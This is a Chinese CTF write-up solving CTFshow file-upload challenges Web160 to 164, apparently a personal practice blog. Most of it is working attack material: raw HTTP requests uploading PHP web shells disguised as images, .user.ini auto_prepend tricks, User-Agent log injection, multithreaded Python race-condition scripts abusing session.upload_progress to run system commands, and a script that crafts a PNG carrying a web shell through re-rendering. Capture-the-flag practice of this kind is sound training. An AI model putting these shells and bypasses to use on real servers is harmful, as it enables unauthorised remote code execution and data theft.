【CTFshow 文件上传 Web160-164】2021.9.12 CTFshow刷题

本文最后更新于:2021年9月12日中午12点01分

Web160

师傅们可以的

打开题目:

image-20210911115158452

这一题过滤了反引号和空格,所以考虑使用日志注入。

先往页面的User-Agent中注入一句话:

image-20210911121018991

然后上传shell.phtml

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
POST /upload.php HTTP/1.1
Host: dfecea0d-b7fe-4dc0-af9c-19cea70c53c8.challenge.ctf.show:8080
Content-Length: 229
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFCBKylEYFsWAKtz0
Origin: http://dfecea0d-b7fe-4dc0-af9c-19cea70c53c8.challenge.ctf.show:8080
Referer: http://dfecea0d-b7fe-4dc0-af9c-19cea70c53c8.challenge.ctf.show:8080/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

------WebKitFormBoundaryFCBKylEYFsWAKtz0
Content-Disposition: form-data; name="file"; filename="shell.phtml"
Content-Type: image/png

<?=include"/var/lo"."g/nginx/access.lo"."g"?>
------WebKitFormBoundaryFCBKylEYFsWAKtz0--

再上传.user.ini

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
POST /upload.php HTTP/1.1
Host: dfecea0d-b7fe-4dc0-af9c-19cea70c53c8.challenge.ctf.show:8080
Content-Length: 211
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFCBKylEYFsWAKtz0
Origin: http://dfecea0d-b7fe-4dc0-af9c-19cea70c53c8.challenge.ctf.show:8080
Referer: http://dfecea0d-b7fe-4dc0-af9c-19cea70c53c8.challenge.ctf.show:8080/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

------WebKitFormBoundaryFCBKylEYFsWAKtz0
Content-Disposition: form-data; name="file"; filename=".user.ini"
Content-Type: image/png

auto_prepend_file=shell.phtml
------WebKitFormBoundaryFCBKylEYFsWAKtz0--

访问upload/index.php,密码为1

image-20210911121127305

官方Hint:

Web161

狮虎们轻点,嘤嘤嘤

打开题目:

image-20210911121204947

比上一题多检测了文件头,所以增加一个GIF89a

先在UA中注入一句话木马:

image-20210911121610004

上传shell.phtml

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
POST /upload.php HTTP/1.1
Host: d9316466-1fbc-46a9-8f2e-299531ae8583.challenge.ctf.show:8080
Content-Length: 238
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryaEi8DnzHuVtADSCB
Origin: http://d9316466-1fbc-46a9-8f2e-299531ae8583.challenge.ctf.show:8080
Referer: http://d9316466-1fbc-46a9-8f2e-299531ae8583.challenge.ctf.show:8080/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

------WebKitFormBoundaryaEi8DnzHuVtADSCB
Content-Disposition: form-data; name="file"; filename="shell.phtml"
Content-Type: image/png

GIF89a
<?=include"/var/lo"."g/nginx/access.lo"."g"?>
------WebKitFormBoundaryaEi8DnzHuVtADSCB--

.user.ini设置如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
POST /upload.php HTTP/1.1
Host: d9316466-1fbc-46a9-8f2e-299531ae8583.challenge.ctf.show:8080
Content-Length: 219
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryaEi8DnzHuVtADSCB
Origin: http://d9316466-1fbc-46a9-8f2e-299531ae8583.challenge.ctf.show:8080
Referer: http://d9316466-1fbc-46a9-8f2e-299531ae8583.challenge.ctf.show:8080/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

------WebKitFormBoundaryaEi8DnzHuVtADSCB
Content-Disposition: form-data; name="file"; filename=".user.ini"
Content-Type: image/png

GIF89a
auto_prepend_file=shell.phtml
------WebKitFormBoundaryaEi8DnzHuVtADSCB--

访问upload/index.php,密码为1

1
POSTDATA: 1=system("cat ../flag.php");

image-20210911121727625

官方Hint:

Web162

姿势挺多的啊?啊?

打开题目:

image-20210911181610834

这题利用条件竞争,相关文章链接:【文件包含&条件竞争】详解如何利用session.upload_progress文件包含进行RCE - Lxxx (xiinnn.com)

先上传.user.ini,让其包含文件png

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
POST /upload.php HTTP/1.1
Host: ef975a4a-4f21-4059-9f12-cd791025107d.challenge.ctf.show:8080
Content-Length: 212
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBsABHxvHz9Ppgpvz
Origin: http://ef975a4a-4f21-4059-9f12-cd791025107d.challenge.ctf.show:8080
Referer: http://ef975a4a-4f21-4059-9f12-cd791025107d.challenge.ctf.show:8080/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

------WebKitFormBoundaryBsABHxvHz9Ppgpvz
Content-Disposition: form-data; name="file"; filename=".user.ini"
Content-Type: image/png

GIF89a
auto_append_file="png"
------WebKitFormBoundaryBsABHxvHz9Ppgpvz--

再上传文件png,让其包含/tmp/sess_Lxxx

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
POST /upload.php HTTP/1.1
Host: ef975a4a-4f21-4059-9f12-cd791025107d.challenge.ctf.show:8080
Content-Length: 212
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBsABHxvHz9Ppgpvz
Origin: http://ef975a4a-4f21-4059-9f12-cd791025107d.challenge.ctf.show:8080
Referer: http://ef975a4a-4f21-4059-9f12-cd791025107d.challenge.ctf.show:8080/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

------WebKitFormBoundaryBsABHxvHz9Ppgpvz
Content-Disposition: form-data; name="file"; filename="png"
Content-Type: image/png

GIF89a
<?=include"/tmp/sess_Lxxx"?>
------WebKitFormBoundaryBsABHxvHz9Ppgpvz--

然后写Python脚本进行条件竞争:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
import requests
import io
import threading

url = "http://ef975a4a-4f21-4059-9f12-cd791025107d.challenge.ctf.show:8080/"
sessid = "Lxxx"

def write(session):
while True:
res = session.post(url,
data={
'PHP_SESSION_UPLOAD_PROGRESS': '<?php system("cat /var/www/html/f*");?>'
},
cookies={
'PHPSESSID': sessid
},
files={
'file': ('Lxxx', "Lxxx")
}
)

def read(session):
while True:
res = session.post(url+"upload/index.php")
if "flag" in res.text:
print(res.text)



if __name__ == "__main__":
evnet = threading.Event()
with requests.session() as session:
for i in range(5):
threading.Thread(target=write, args=(session,)).start()
for i in range(5):
threading.Thread(target=read, args=(session,)).start()
evnet.set()

即可得到flag

image-20210911181429478

官方Hint:

Web163

玉石俱焚

打开题目:

image-20210912112421037

和web162一样

先上传.user.ini

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
POST /upload.php HTTP/1.1
Host: 5cf1e02b-1283-421f-b764-3b38954c5a4d.challenge.ctf.show:8080
Content-Length: 221
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoP7ltwfS808yQyUS
Origin: http://5cf1e02b-1283-421f-b764-3b38954c5a4d.challenge.ctf.show:8080
Referer: http://5cf1e02b-1283-421f-b764-3b38954c5a4d.challenge.ctf.show:8080/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

------WebKitFormBoundaryoP7ltwfS808yQyUS
Content-Disposition: form-data; name="file"; filename=".user.ini"
Content-Type: image/png

GIF89a
auto_append_file=/tmp/sess_Lxxx
------WebKitFormBoundaryoP7ltwfS808yQyUS--

然后跑Python脚本:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
import requests
import io
import threading

url = "http://5cf1e02b-1283-421f-b764-3b38954c5a4d.challenge.ctf.show:8080/"
sessid = "Lxxx"

def write(session):
while True:
res = session.post(url,
data={
'PHP_SESSION_UPLOAD_PROGRESS': '<?php system("cat /var/www/html/flag.php");?>'
},
cookies={
'PHPSESSID': sessid
},
files={
'file': ('Lxxx', "Lxxx"*1024)
}
)

def read(session):
while True:
res = session.post(url+"upload/index.php")
if "ctfshow" in res.text:
print(res.text)



if __name__ == "__main__":
evnet = threading.Event()
with requests.session() as session:
for i in range(50):
threading.Thread(target=write, args=(session,)).start()
for i in range(50):
threading.Thread(target=read, args=(session,)).start()
evnet.set()

得到flag:

image-20210912112507229

官方Hint:

Web164

改头换面

打开题目:

image-20210912115401877

这题考察的是png二次渲染绕过,这里直接给出payload,原理详解之后再单独写一篇文章(挖坑

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
<?php
$p = array(0xa3, 0x9f, 0x67, 0xf7, 0x0e, 0x93, 0x1b, 0x23,
0xbe, 0x2c, 0x8a, 0xd0, 0x80, 0xf9, 0xe1, 0xae,
0x22, 0xf6, 0xd9, 0x43, 0x5d, 0xfb, 0xae, 0xcc,
0x5a, 0x01, 0xdc, 0x5a, 0x01, 0xdc, 0xa3, 0x9f,
0x67, 0xa5, 0xbe, 0x5f, 0x76, 0x74, 0x5a, 0x4c,
0xa1, 0x3f, 0x7a, 0xbf, 0x30, 0x6b, 0x88, 0x2d,
0x60, 0x65, 0x7d, 0x52, 0x9d, 0xad, 0x88, 0xa1,
0x66, 0x44, 0x50, 0x33);



$img = imagecreatetruecolor(32, 32);

for ($y = 0; $y < sizeof($p); $y += 3) {
$r = $p[$y];
$g = $p[$y+1];
$b = $p[$y+2];
$color = imagecolorallocate($img, $r, $g, $b);
imagesetpixel($img, round($y / 3), 0, $color);
}

imagepng($img,'./1.png');
?>

保存运行后得到一张1.png,然后上传1.png后得到图片链接,连接一句话即可,一句话木马内容如下:

1
<?=$_GET[0]($_POST[1]);?>

POC如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
POST /download.php?image=4a47a0db6e60853dedfcfdf08a5ca249.png&0=system HTTP/1.1
Host: 68ed71e7-d3bc-4cd2-ab0e-9ecac9d7f57d.challenge.ctf.show:8080
Content-Length: 14
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://68ed71e7-d3bc-4cd2-ab0e-9ecac9d7f57d.challenge.ctf.show:8080
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://68ed71e7-d3bc-4cd2-ab0e-9ecac9d7f57d.challenge.ctf.show:8080/download.php?image=4a47a0db6e60853dedfcfdf08a5ca249.png&0=system
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

1=cat flag.php

官方Hint: